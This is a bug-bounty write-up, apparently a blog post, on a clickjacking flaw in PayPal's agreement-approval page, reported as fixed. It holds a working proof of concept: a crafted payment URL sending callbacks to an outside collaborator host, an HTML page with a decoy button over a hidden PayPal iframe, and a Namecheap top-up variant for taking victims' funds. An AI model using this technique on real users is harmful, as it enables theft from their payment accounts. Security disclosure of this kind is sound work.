Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click

h4x0r_dz
5 min readMay 22, 2022

--

what if I told you that: A black Hat hacker can steal your money from your bank account & credit card or PayPal balance with one click from you. It looks interesting, doesn’t it? in this write-up, I will show you how I Found Low vulnerability on PayPal, But impactful :).

summary

7 months ago I reported a security issue to PayPal bug bounty program where the attacker can steal users' money by exploiting Clickjacking,

Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top level page. Thus, the attacker is “hijacking” clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both. reference: https://owasp.org/www-community/attacks/Clickjacking

I found that an attacker can steal money from Paypal accounts. an old issue: Clickjacking on https://www.paypal.com/agreements/approve closed as N/A years ago, and no one was able to successfully exploit it, (I guess ).

this endpoint is designed for Billing Agreements and it should accept only billingAgreementToken. but during my deep testing, I found that we can pass another tokens type, and this leads to stealing money from victim's PayPal account.

as you can see in the picture, the attacker is able to load a sensitive paypal.com endpoint in an Iframe, and when the attacker clicks on “near to click here” He will buy something.

of course, the victim should be logged in in te the browser

Proof 0f C0ncept

"https://www.paypal.com/cgi-bin/webscr?address1=sectesting&address2=sectesting02&address_override=true&amount_1=1&business=<attacker@gmail.com>&cancel_return=https://xxxxxx.burpcollaborator.net/cancel_return&city=barika&cmd=_cart&country=DZ&currency_code=USD&email=<anything>@gmail.com&first_name=attacker&invoice=marketplace133703&item_name_1=attacker&item_number_1=133788802&last_name=attacker&notify_url=https://xxxxxx.burpcollaborator.net/notify_url&quantity_1=1&return=https://xxxxxx.burpcollaborator.net/return&state=05&upload=1&zip=1337"

  1. In the link above change the business to attacker Paypal email, and return & notify_url to your host to receive the HTTP requests. and amount_1 how much money you want to steal from the victim's account !!.

and You can change the first/last name, and the address to your own info, and when you do this, this Billing full name/address will register in the victim account !.

2 . now send GET request using CURL, and grep the token value.

3. upload this poc.html On your host and put your token In the parameter ba_token.

<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<center> <img src="https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg"></center>
<style>
iframe {
width: 1920px;
height: 1080px;
position: absolute;
top:0; left:-20px;
opacity: 1.01;
z-index: 1;
}
</style>
<iframe src="https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=<TOKEN>"></iframe>
<button style="position: fixed; display: inline; z-index: 10; left: 701px; top: 520px;">Click here to win 1337$ => </button>
</body>
</html>

Note : the opacity should be 0 in a real attack, you can change it.

Now Login to your PayPal in the browser, and open the HTML page.

as you Can see, I’m not the best designer, actually, I know nothing about CSS , but this POC is enough I think !.

you should click where you should click hahaha, and you will send money to the attacker PayPal. also, the attacker address will be injected as the default billing.

here In Burp Collaborator we can see full information for the victim's account when he clicks on the vulnerable page :

Also, another security issue, is the attacker injected billing address will be the default one on the victim's PayPal account :

steal money from user account part 2

there are online services that let you add balance using Paypal to your account for example steam! . I can use the same exploit and force the user to add money to my account!

or I can exploit this bug and let the victim create/pay Netflix account for me !.

but I used namecheap.com for this example

steps

1- open https://ap.www.namecheap.com/Profile/Billing

2- click Topup

3- chose how much you want to steal $ from the victim account !

4- click check out with PayPal

5- now copy the token and add it to the poc.html

6- open the HTML page.

7- now when the victim clicks on “click here” he will pay using his payment method that is linked to his Paypal account.

Now you have given permission to Namecheap to take a certain balance on your Paypal account, which will go to the attacker’s account on Namecheap

8- as an attacker opens https://ap.www.namecheap.com/profile/billing/topup/paypal/submit?&token=<token> and you will be able to add the money to your Namecheap account.

video POC :

200k$ bounty rewarded!

sorry for the Clickbait, but this is was HackerOne triage response :

update: 17/06/2022

PayPal Bug Bounty Team decided to accept the report & fix this issue and awarded me 3200$ :

--

--

Responses (10)